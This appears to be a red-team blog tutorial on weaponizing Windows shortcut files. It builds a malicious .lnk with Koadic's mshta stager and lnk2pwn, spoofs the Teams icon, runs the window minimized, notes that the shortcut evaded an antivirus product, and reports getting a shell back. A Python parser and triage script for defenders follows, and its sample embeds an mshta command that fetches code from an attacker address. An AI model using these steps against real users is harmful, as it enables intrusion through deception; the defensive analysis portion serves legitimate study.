Pwning with shortcuts: abusing the Windows LNK feature to get a foothold
On Windows, .lnk is the file extension of shortcut files. A shortcut points to an actual file (its target) and, when opened, launches that target with whatever arguments the shortcut carries. In this post we will see how a threat actor can abuse the Windows LNK feature, combined with a few social engineering tricks, to make someone run a malicious application.
What this post is about
This post is the first in a series on social engineering attacks in which an attacker uses a malicious shortcut file with a spoofed extension (using Unicode characters) and a borrowed icon. Shortcut files can be combined with living-off-the-land techniques, which can help bypass Windows Defender.
What this post is not about
This post only shows the initial access part, where an attacker gains access to the victim machine using very basic techniques. The next post will cover evading most antivirus products and detections.
Preparing the Attack
For this attack I am going to use Koadic, a COM-based command and control framework. Koadic can deliver its payload directly in memory from stage 0 using living-off-the-land binaries such as mshta, which helps bypass basic detection.
I am going to select the mshta stager by typing use stager/js/mshta
Next I set the ENDPOINT option to trusted, which will be the payload name in the stager URL
Now run the stager
Our attacker machine is now ready to serve the payload
Preparing the malicious shortcut file
You can create a malicious shortcut file manually, but to automate things a little I am going to use lnk2pwn.
After running lnk2pwn, this is what we get on screen:
Download the .ico file you want to use for spoofing the icon; I am using the Microsoft Teams app icon for this. Alternatively, install the program and load the icon from its installed location.
Now in lnk2pwn use the following settings:
1. Put your malicious command here (the mshta one-liner from the Koadic stager). Prefer a LOLBin so that the shortcut only invokes a signed Windows binary and nothing foreign has to be dropped on disk.
2. Set the location of your .ico file. Make sure you spoof an icon from software that is installed on the victim (for example, choose an icon from Program Files or System32): the icon path is resolved on the victim's machine, so an icon that only exists on your machine will not load there. I am using a downloaded icon just for the demo.
3. Select the minimize option; this sets the shortcut's window style so the cmd prompt runs minimized and the victim does not see a console flash up.
4. Select your fake extension. I am leaving it blank because I want to keep it a plain .lnk file. Note that Explorer never displays the .lnk extension (the lnkfile file type carries the NeverShowExt value), so a shortcut named report.pdf shows up as report.pdf with the borrowed icon even when "show file extensions" is enabled.
5. Click the generate button and choose where to save the malicious shortcut file.
Our shortcut file is ready to be delivered.
I tested this shortcut file on the victim machine with an updated version of Quick Heal and it was not able to detect the file.
Finally I executed the file and it ran the mshta command inside the minimized cmd prompt.
And I got a shell back on my Kali machine.
Analyzing the malicious lnk file
You can use exiftool to inspect a suspicious .lnk file, but LECmd by Eric Zimmerman does a better job of parsing it, as shown below. The fields worth checking are the target path, the command line arguments, the icon location and the show command: a LOLBin on the command line, a URL in the arguments, an icon borrowed from a different program and a window that starts minimized are exactly the settings chosen above.
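As an added example (not code from the post, Koadic or lnk2pwn), the following Python script ties the two halves of this post together: build_lnk writes the fields that the lnk2pwn settings above control (target, working directory, command line arguments, icon location and the minimized window style) into a minimal Shell Link laid out per the MS-SHLLINK specification, and parse_lnk/triage read a .lnk back and flag what a responder would look for: LOLBin launchers, URLs on the command line, a minimized window and an icon borrowed from a different program. The sample shortcut, the attacker address 10.0.0.5 and the Teams path are constructed for the demo. The builder deliberately omits the LinkTargetIDList and LinkInfo structures a real generator writes, so it exists to exercise the parser, not to produce a deliverable shortcut.

```python
import re
import struct
from dataclasses import dataclass

# Constants from the MS-SHLLINK specification (ShellLinkHeader / LinkFlags)
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value carried by a "run minimized" shortcut

# StringData sections follow the optional IDList/LinkInfo in this fixed order
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Signed Windows binaries commonly used to launch a stager from a shortcut
LOLBINS = frozenset({"cmd", "mshta", "powershell", "pwsh", "rundll32", "regsvr32",
                     "certutil", "wscript", "cscript", "bitsadmin", "msiexec"})


@dataclass
class LnkFields:
    flags: int
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def build_lnk(relative_path, working_dir, arguments, icon_location, show_command):
    """Minimal Shell Link: header, empty IDList, StringData, TerminalBlock (demo only)."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags,
                         0x20,         # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0, 0,   # creation/access/write FILETIME, FileSize
                         0,            # IconIndex
                         show_command,
                         0, 0, 0, 0)   # HotKey, Reserved1, Reserved2, Reserved3
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # IDListSize=2: just the TerminalID

    def sd(s):  # StringData: CountCharacters then UTF-16LE chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = sd(relative_path) + sd(working_dir) + sd(arguments) + sd(icon_location)
    return header + id_list + body + b"\x00\x00\x00\x00"  # TerminalBlock


def _read_string_data(buf, off, unicode):
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    end = off + (2 * count if unicode else count)
    text = buf[off:end].decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return text, end


def parse_lnk(buf: bytes) -> LnkFields:
    """Parse the header and StringData of a .lnk; IDList and LinkInfo are skipped by size."""
    if len(buf) < 0x4C:
        raise ValueError("too short to be a Shell Link file")
    header_size, clsid, flags = struct.unpack_from("<I16sI", buf, 0)
    if header_size != 0x4C or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file (bad HeaderSize or LinkCLSID)")
    (show_command,) = struct.unpack_from("<I", buf, 0x3C)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) + IDList
        (size,) = struct.unpack_from("<H", buf, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts itself
        (size,) = struct.unpack_from("<I", buf, off)
        off += size
    fields = LnkFields(flags=flags, show_command=show_command)
    for bit, attr in STRING_FIELDS:
        if flags & bit:
            value, off = _read_string_data(buf, off, bool(flags & IS_UNICODE))
            setattr(fields, attr, value)
    return fields


def _basename(token):
    return token.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()


def triage(fields: LnkFields) -> list:
    """Return the red flags a responder wants to see for a shortcut."""
    findings, seen = [], set()
    command_line = f"{fields.relative_path} {fields.arguments}".lower()
    for token in re.findall(r"""[^\s"']+""", command_line):
        name = _basename(token)
        name = name[:-4] if name.endswith(".exe") else name
        if name in LOLBINS and name not in seen:
            seen.add(name)
            findings.append(f"launches LOLBin: {name}")
    if re.search(r"https?://", command_line):
        findings.append("remote URL on the command line")
    if fields.show_command == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    if fields.icon_location and fields.relative_path:
        icon_exe = _basename(fields.icon_location.split(",")[0])  # strip ",index"
        target_exe = _basename(fields.relative_path)
        if icon_exe != target_exe:
            findings.append(f"icon borrowed from {icon_exe} but target is {target_exe}")
    return findings


def triage_file(path):
    with open(path, "rb") as fh:
        fields = parse_lnk(fh.read())
    return fields, triage(fields)


# Constructed sample mirroring the lnk2pwn settings used in the post; the
# attacker address 10.0.0.5 and the Teams path are placeholders, not real data.
SAMPLE = build_lnk(relative_path="..\\..\\..\\Windows\\System32\\cmd.exe",
                   working_dir="C:\\Windows\\System32",
                   arguments="/c mshta http://10.0.0.5/trusted",
                   icon_location="C:\\Program Files\\Microsoft Teams\\Teams.exe",
                   show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    f = parse_lnk(SAMPLE)
    print("target:", f.relative_path, f.arguments)
    print("icon:  ", f.icon_location, "| show command:", f.show_command)
    for line in triage(f):
        print(" !", line)
```

triage_file(path) runs the same checks on a shortcut pulled from a mailbox or a user's Downloads folder; it only reads bytes and never resolves or launches the shortcut, so it is safe to run on a live sample. Real shortcuts also carry a LinkInfo block and, usually, a TrackerDataBlock with the creating machine's NetBIOS name and MAC address, which LECmd prints and which is often the most useful attribution artifact in the file.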
Final words
This was a very basic method of abusing the LNK feature. In my next post we will see how this method can help an attacker bypass some popular AVs.